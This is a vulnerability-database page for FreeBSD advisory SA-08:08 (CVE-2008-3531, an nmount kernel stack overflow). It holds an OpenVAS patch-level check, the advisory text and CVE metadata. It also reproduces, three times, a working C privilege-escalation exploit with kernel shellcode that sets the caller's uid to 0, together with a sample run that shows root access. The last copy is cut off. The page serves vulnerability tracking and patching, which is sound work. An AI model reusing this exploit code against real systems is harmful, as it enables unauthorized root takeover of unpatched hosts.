Search...

FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)

2008-09-04T00:00:00

ID OPENVAS:61514
Type openvas
Reporter Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
Modified 2017-12-07T00:00:00

Description

The remote host is missing an update to the system as announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc

                                        
                                            #
#ADV FreeBSD-SA-08:08.nmount.asc
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from ADV FreeBSD-SA-08:08.nmount.asc
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_insight = "The mount(2) and nmount(2) system calls are used by various utilities
in the base system to graft a file system object on to the file system
tree to a given mount point.  It is possible to allow unprivileged
users to utililize these system calls by setting the vfs.usermount
sysctl(8) variable.

Various user defined input such as mount points, devices, and mount
options are prepared and passed as arguments to nmount(2) into the
kernel.  Under certain error conditions, user defined data will be
copied into a stack allocated buffer stored in the kernel without
sufficient bounds checking.";
tag_solution = "Upgrade your system to the appropriate stable release
or security branch dated after the correction date

https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-08:08.nmount.asc";
tag_summary = "The remote host is missing an update to the system
as announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc";


if(description)
{
 script_id(61514);
 script_version("$Revision: 8023 $");
 script_tag(name:"last_modification", value:"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $");
 script_tag(name:"creation_date", value:"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)");
 script_cve_id("CVE-2008-3531");
 script_tag(name:"cvss_base", value:"6.9");
 script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
 name = "FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)";
 script_name(name);



 script_category(ACT_GATHER_INFO);

 script_copyright("Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com");
 family = "FreeBSD Local Security Checks";
 script_family(family);
 script_dependencies("gather-package-list.nasl");
 script_mandatory_keys("ssh/login/freebsdpatchlevel", "login/SSH/success");
 script_tag(name : "insight" , value : tag_insight);
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name:"qod_type", value:"package");
 script_tag(name:"solution_type", value:"VendorFix");
 exit(0);
}

#
# The script code starts here
#

include("pkg-lib-bsd.inc");
vuln = 0;
if(patchlevelcmp(rel:"7.0", patchlevel:"4")&lt;0) {
    vuln = 1;
}

if(vuln) {
    security_message(0);
} else if (__pkg_match) {
    exit(99); # Not vulnerable.
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:61514", "type": "openvas", "bulletinFamily": "scanner", "title": "FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc", "published": "2008-09-04T00:00:00", "modified": "2017-12-07T00:00:00", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=61514", "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2008-3531"], "lastseen": "2017-12-08T11:44:53", "viewCount": 1, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-12-08T11:44:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3531"]}, {"type": "exploitdb", "idList": ["EDB-ID:9082"]}, {"type": "seebug", "idList": ["SSV:11781", "SSV:3982"]}, {"type": "freebsd", "idList": ["7DBB7197-7B68-11DD-80BA-000BCDF0A03B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9267", "SECURITYVULNS:DOC:20467"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CCC81755021F2F33AC4AB350A8FC7FEE"]}], "modified": "2017-12-08T11:44:53", "rev": 2}, "vulnersScore": 6.6}, "pluginID": "61514", "sourceData": "#\n#ADV FreeBSD-SA-08:08.nmount.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from ADV FreeBSD-SA-08:08.nmount.asc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_insight = \"The mount(2) and nmount(2) system calls are used by various utilities\nin the base system to graft a file system object on to the file system\ntree to a given mount point. It is possible to allow unprivileged\nusers to utililize these system calls by setting the vfs.usermount\nsysctl(8) variable.\n\nVarious user defined input such as mount points, devices, and mount\noptions are prepared and passed as arguments to nmount(2) into the\nkernel. Under certain error conditions, user defined data will be\ncopied into a stack allocated buffer stored in the kernel without\nsufficient bounds checking.\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-08:08.nmount.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc\";\n\n\nif(description)\n{\n script_id(61514);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-3531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n name = \"FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n family = \"FreeBSD Local Security Checks\";\n script_family(family);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"7.0\", patchlevel:\"4\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "FreeBSD Local Security Checks"}

{"cve": [{"lastseen": "2020-10-03T11:51:00", "description": "Stack-based buffer overflow in sys/kern/vfs_mount.c in the kernel in FreeBSD 7.0 and 7.1, when vfs.usermount is enabled, allows local users to gain privileges via a crafted (1) mount or (2) nmount system call, related to copying of \"user defined data\" in \"certain error conditions.\"", "edition": 3, "cvss3": {}, "published": "2008-09-05T16:08:00", "title": "CVE-2008-3531", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3531"], "modified": "2017-08-08T01:31:00", "cpe": ["cpe:/o:freebsd:freebsd:7.1", "cpe:/o:freebsd:freebsd:7.0"], "id": "CVE-2008-3531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T09:50:03", "description": "FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit. CVE-2008-3531. Local exploit for freebsd platform", "published": "2009-07-09T00:00:00", "type": "exploitdb", "title": "FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2009-07-09T00:00:00", "id": "EDB-ID:9082", "href": "https://www.exploit-db.com/exploits/9082/", "sourceData": "/* \r\n * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com\r\n *\r\n * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount\r\n * (CVE-2008-3531) vulnerability:\r\n * \r\n * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc\r\n * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531\r\n *\r\n * For a detailed analysis see:\r\n *\r\n * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/\r\n * \r\n * Sample run:\r\n * \r\n * [argp@leon ~]$ uname -rsi\r\n * FreeBSD 7.0-RELEASE GENERIC\r\n * [argp@leon ~]$ sysctl vfs.usermount\r\n * vfs.usermount: 1\r\n * [argp@leon ~]$ id\r\n * uid=1001(argp) gid=1001(argp) groups=1001(argp)\r\n * [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531\r\n * [argp@leon ~]$ ./cve-2008-3531\r\n * [*] vptr = 0x006e776f\r\n * [*] calling nmount()\r\n * nmount: Unknown error: -1036235776\r\n * [argp@leon ~]$ id\r\n * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)\r\n *\r\n * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $\r\n */\r\n\r\n#include <sys/param.h>\r\n#include <sys/mount.h>\r\n#include <sys/uio.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sysexits.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n\r\n#define BUFSIZE 249\r\n\r\n#define PAGESIZE 4096\r\n#define ADDR 0x6e7000\r\n#define OFFSET 1903\r\n\r\n#define FSNAME \"msdosfs\"\r\n#define DIRPATH \"/tmp/msdosfs\"\r\n\r\nunsigned char kernelcode[] =\r\n\"\\x64\\xa1\\x00\\x00\\x00\\x00\" /* movl %fs:0, %eax # get curthread */\r\n\"\\x8b\\x40\\x04\" /* movl 0x4(%eax), %eax # get proc from curthread */\r\n\"\\x8b\\x40\\x30\" /* movl 0x30(%eax),%eax # get ucred from proc */\r\n\"\\x31\\xc9\" /* xorl %ecx, %ecx # ecx = 0 */\r\n\"\\x89\\x48\\x04\" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */\r\n\"\\x89\\x48\\x08\" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */\r\n /* # return to the pre-previous function, i.e. vfs_donmount() */\r\n\"\\x81\\xc4\\xe8\\x00\\x00\\x00\" /* addl $0xe8, %esp */\r\n\"\\x5b\" /* popl %ebx */\r\n\"\\x5e\" /* popl %esi */\r\n\"\\x5f\" /* popl %edi */\r\n\"\\x5d\" /* popl %ebp */\r\n\"\\xc3\"; /* ret */\r\n\r\nint\r\nmain()\r\n{\r\n void *vptr;\r\n struct iovec iov[6];\r\n\r\n vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,\r\n MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\r\n if(vptr == MAP_FAILED)\r\n {\r\n perror(\"mmap\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n vptr += OFFSET;\r\n printf(\"[*] vptr = 0x%.8x\\n\", (unsigned int)vptr);\r\n\r\n memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));\r\n\r\n mkdir(DIRPATH, 0700);\r\n\r\n iov[0].iov_base = \"fstype\";\r\n iov[0].iov_len = strlen(iov[0].iov_base) + 1;\r\n \r\n iov[1].iov_base = FSNAME;\r\n iov[1].iov_len = strlen(iov[1].iov_base) + 1;\r\n \r\n iov[2].iov_base = \"fspath\";\r\n iov[2].iov_len = strlen(iov[2].iov_base) + 1;\r\n \r\n iov[3].iov_base = DIRPATH;\r\n iov[3].iov_len = strlen(iov[3].iov_base) + 1;\r\n\r\n iov[4].iov_base = calloc(BUFSIZE, sizeof(char));\r\n\r\n if(iov[4].iov_base == NULL)\r\n {\r\n perror(\"calloc\");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));\r\n iov[4].iov_len = BUFSIZE;\r\n\r\n iov[5].iov_base = \"BBBB\";\r\n iov[5].iov_len = strlen(iov[5].iov_base) + 1;\r\n\r\n printf(\"[*] calling nmount()\\n\");\r\n\r\n if(nmount(iov, 6, 0) < 0)\r\n {\r\n perror(\"nmount\");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n printf(\"[*] unmounting and deleting %s\\n\", DIRPATH);\r\n unmount(DIRPATH, 0);\r\n rmdir(DIRPATH);\r\n\r\n return EXIT_SUCCESS;\r\n}\r\n\r\n// milw0rm.com [2009-07-09]\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9082/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-3531"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-08:08.nmount Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: nmount(2) local arbitrary code execution\r\n\r\nCategory: core\r\nModule: sys_kern\r\nAnnounced: 2008-09-03\r\nCredits: James Gritton\r\nAffects: FreeBSD 7.0-RELEASE, FreeBSD 7.0-STABLE\r\nCorrected: 2008-09-03 19:09:47 UTC (RELENG_7, 7.1-PRERELEASE)\r\n 2008-09-03 19:09:47 UTC (RELENG_7_0, 7.0-RELEASE-p4)\r\nCVE Name: CVE-2008-3531\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe mount(2) and nmount(2) system calls are used by various utilities\r\nin the base system to graft a file system object on to the file system\r\ntree to a given mount point. It is possible to allow unprivileged\r\nusers to utililize these system calls by setting the vfs.usermount\r\nsysctl(8) variable.\r\n\r\nII. Problem Description\r\n\r\nVarious user defined input such as mount points, devices, and mount\r\noptions are prepared and passed as arguments to nmount(2) into the\r\nkernel. Under certain error conditions, user defined data will be\r\ncopied into a stack allocated buffer stored in the kernel without\r\nsufficient bounds checking.\r\n\r\nIII. Impact\r\n\r\nIf the system is configured to allow unprivileged users to mount file\r\nsystems, it is possible for a local adversary to exploit this\r\nvulnerability and execute code in the context of the kernel.\r\n\r\nIV. Workaround\r\n\r\nIt is possible to work around this issue by allowing only privileged\r\nusers to mount file systems by running the following sysctl(8)\r\ncommand:\r\n\r\n# sysctl vfs.usermount=0\r\n\r\nV. Solution\r\n\r\nNOTE WELL: Even with this fix allowing users to mount arbitrary media\r\nshould not be considered safe. Most of the file systems in FreeBSD\r\nwas not built to protect safeguard against malicious devices. While\r\nsuch bugs in file systems are fixed when found, a complete audit has\r\nnot been perfomed on the file system code.\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, or to the RELENG_7_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To patch your present system:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-08:08/nmount.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-08:08/nmount.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/kern/vfs_mount.c 1.265.2.10\r\nRELENG_7_0\r\n src/UPDATING 1.507.2.3.2.8\r\n src/sys/conf/newvers.sh 1.72.2.5.2.8\r\n src/sys/kern/vfs_mount.c 1.265.2.1.2.2\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3531\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-08:08.nmount.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (FreeBSD)\r\n\r\niD8DBQFIvu2eFdaIBMps37IRAl9BAJ9Jnp+agN06pBkzPDwEnOT83MNd6QCghOFX\r\nyvNI1gVmhAQ7MXOUvPoLcLk=\r\n=EsCn\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-09-07T00:00:00", "published": "2008-09-07T00:00:00", "id": "SECURITYVULNS:DOC:20467", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20467", "title": "FreeBSD Security Advisory FreeBSD-SA-08:08.nmount", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-3530", "CVE-2008-3531", "CVE-2008-3890"], "description": "mount / nmount syscall implementcation buffer overflow. amd64 CPU registers privilege escalation. DoS \u0447\u0435\u0440\u0435\u0437 ICMPv6.", "edition": 1, "modified": "2009-07-03T00:00:00", "published": "2009-07-03T00:00:00", "id": "SECURITYVULNS:VULN:9267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9267", "title": "FreeBSD multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFreeBSD 7.07.1 - vfs.usermount Local Privilege Escalation", "edition": 1, "published": "2009-07-09T00:00:00", "title": "FreeBSD 7.07.1 - vfs.usermount Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2009-07-09T00:00:00", "id": "EXPLOITPACK:CCC81755021F2F33AC4AB350A8FC7FEE", "href": "", "sourceData": "/* \n * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com\n *\n * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount\n * (CVE-2008-3531) vulnerability:\n * \n * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc\n * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531\n *\n * For a detailed analysis see:\n *\n * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/\n * \n * Sample run:\n * \n * [argp@leon ~]$ uname -rsi\n * FreeBSD 7.0-RELEASE GENERIC\n * [argp@leon ~]$ sysctl vfs.usermount\n * vfs.usermount: 1\n * [argp@leon ~]$ id\n * uid=1001(argp) gid=1001(argp) groups=1001(argp)\n * [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531\n * [argp@leon ~]$ ./cve-2008-3531\n * [*] vptr = 0x006e776f\n * [*] calling nmount()\n * nmount: Unknown error: -1036235776\n * [argp@leon ~]$ id\n * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)\n *\n * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $\n */\n\n#include <sys/param.h>\n#include <sys/mount.h>\n#include <sys/uio.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sysexits.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n\n#define BUFSIZE 249\n\n#define PAGESIZE 4096\n#define ADDR 0x6e7000\n#define OFFSET 1903\n\n#define FSNAME \"msdosfs\"\n#define DIRPATH \"/tmp/msdosfs\"\n\nunsigned char kernelcode[] =\n\"\\x64\\xa1\\x00\\x00\\x00\\x00\" /* movl %fs:0, %eax # get curthread */\n\"\\x8b\\x40\\x04\" /* movl 0x4(%eax), %eax # get proc from curthread */\n\"\\x8b\\x40\\x30\" /* movl 0x30(%eax),%eax # get ucred from proc */\n\"\\x31\\xc9\" /* xorl %ecx, %ecx # ecx = 0 */\n\"\\x89\\x48\\x04\" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */\n\"\\x89\\x48\\x08\" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */\n /* # return to the pre-previous function, i.e. vfs_donmount() */\n\"\\x81\\xc4\\xe8\\x00\\x00\\x00\" /* addl $0xe8, %esp */\n\"\\x5b\" /* popl %ebx */\n\"\\x5e\" /* popl %esi */\n\"\\x5f\" /* popl %edi */\n\"\\x5d\" /* popl %ebp */\n\"\\xc3\"; /* ret */\n\nint\nmain()\n{\n void *vptr;\n struct iovec iov[6];\n\n vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,\n MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if(vptr == MAP_FAILED)\n {\n perror(\"mmap\");\n exit(EXIT_FAILURE);\n }\n\n vptr += OFFSET;\n printf(\"[*] vptr = 0x%.8x\\n\", (unsigned int)vptr);\n\n memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));\n\n mkdir(DIRPATH, 0700);\n\n iov[0].iov_base = \"fstype\";\n iov[0].iov_len = strlen(iov[0].iov_base) + 1;\n \n iov[1].iov_base = FSNAME;\n iov[1].iov_len = strlen(iov[1].iov_base) + 1;\n \n iov[2].iov_base = \"fspath\";\n iov[2].iov_len = strlen(iov[2].iov_base) + 1;\n \n iov[3].iov_base = DIRPATH;\n iov[3].iov_len = strlen(iov[3].iov_base) + 1;\n\n iov[4].iov_base = calloc(BUFSIZE, sizeof(char));\n\n if(iov[4].iov_base == NULL)\n {\n perror(\"calloc\");\n rmdir(DIRPATH);\n exit(EXIT_FAILURE);\n }\n\n memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));\n iov[4].iov_len = BUFSIZE;\n\n iov[5].iov_base = \"BBBB\";\n iov[5].iov_len = strlen(iov[5].iov_base) + 1;\n\n printf(\"[*] calling nmount()\\n\");\n\n if(nmount(iov, 6, 0) < 0)\n {\n perror(\"nmount\");\n rmdir(DIRPATH);\n exit(EXIT_FAILURE);\n }\n\n printf(\"[*] unmounting and deleting %s\\n\", DIRPATH);\n unmount(DIRPATH, 0);\n rmdir(DIRPATH);\n\n return EXIT_SUCCESS;\n}\n\n// milw0rm.com [2009-07-09]", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:45:17", "description": "No description provided by source.", "published": "2009-07-10T00:00:00", "type": "seebug", "title": "FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11781", "id": "SSV:11781", "sourceData": "\n /* \r\n * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com\r\n *\r\n * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount\r\n * (CVE-2008-3531) vulnerability:\r\n * \r\n * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc\r\n * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531\r\n *\r\n * For a detailed analysis see:\r\n *\r\n * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/\r\n * \r\n * Sample run:\r\n * \r\n * [argp@leon ~]$ uname -rsi\r\n * FreeBSD 7.0-RELEASE GENERIC\r\n * [argp@leon ~]$ sysctl vfs.usermount\r\n * vfs.usermount: 1\r\n * [argp@leon ~]$ id\r\n * uid=1001(argp) gid=1001(argp) groups=1001(argp)\r\n * [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531\r\n * [argp@leon ~]$ ./cve-2008-3531\r\n * [*] vptr = 0x006e776f\r\n * [*] calling nmount()\r\n * nmount: Unknown error: -1036235776\r\n * [argp@leon ~]$ id\r\n * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)\r\n *\r\n * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $\r\n */\r\n\r\n#include <sys/param.h>\r\n#include <sys/mount.h>\r\n#include <sys/uio.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sysexits.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n\r\n#define BUFSIZE 249\r\n\r\n#define PAGESIZE 4096\r\n#define ADDR 0x6e7000\r\n#define OFFSET 1903\r\n\r\n#define FSNAME "msdosfs"\r\n#define DIRPATH "/tmp/msdosfs"\r\n\r\nunsigned char kernelcode[] =\r\n"\\x64\\xa1\\x00\\x00\\x00\\x00" /* movl %fs:0, %eax # get curthread */\r\n"\\x8b\\x40\\x04" /* movl 0x4(%eax), %eax # get proc from curthread */\r\n"\\x8b\\x40\\x30" /* movl 0x30(%eax),%eax # get ucred from proc */\r\n"\\x31\\xc9" /* xorl %ecx, %ecx # ecx = 0 */\r\n"\\x89\\x48\\x04" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */\r\n"\\x89\\x48\\x08" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */\r\n /* # return to the pre-previous function, i.e. vfs_donmount() */\r\n"\\x81\\xc4\\xe8\\x00\\x00\\x00" /* addl $0xe8, %esp */\r\n"\\x5b" /* popl %ebx */\r\n"\\x5e" /* popl %esi */\r\n"\\x5f" /* popl %edi */\r\n"\\x5d" /* popl %ebp */\r\n"\\xc3"; /* ret */\r\n\r\nint\r\nmain()\r\n{\r\n void *vptr;\r\n struct iovec iov[6];\r\n\r\n vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,\r\n MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\r\n if(vptr == MAP_FAILED)\r\n {\r\n perror("mmap");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n vptr += OFFSET;\r\n printf("[*] vptr = 0x%.8x\\n", (unsigned int)vptr);\r\n\r\n memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));\r\n\r\n mkdir(DIRPATH, 0700);\r\n\r\n iov[0].iov_base = "fstype";\r\n iov[0].iov_len = strlen(iov[0].iov_base) + 1;\r\n \r\n iov[1].iov_base = FSNAME;\r\n iov[1].iov_len = strlen(iov[1].iov_base) + 1;\r\n \r\n iov[2].iov_base = "fspath";\r\n iov[2].iov_len = strlen(iov[2].iov_base) + 1;\r\n \r\n iov[3].iov_base = DIRPATH;\r\n iov[3].iov_len = strlen(iov[3].iov_base) + 1;\r\n\r\n iov[4].iov_base = calloc(BUFSIZE, sizeof(char));\r\n\r\n if(iov[4].iov_base == NULL)\r\n {\r\n perror("calloc");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));\r\n iov[4].iov_len = BUFSIZE;\r\n\r\n iov[5].iov_base = "BBBB";\r\n iov[5].iov_len = strlen(iov[5].iov_base) + 1;\r\n\r\n printf("[*] calling nmount()\\n");\r\n\r\n if(nmount(iov, 6, 0) < 0)\r\n {\r\n perror("nmount");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n 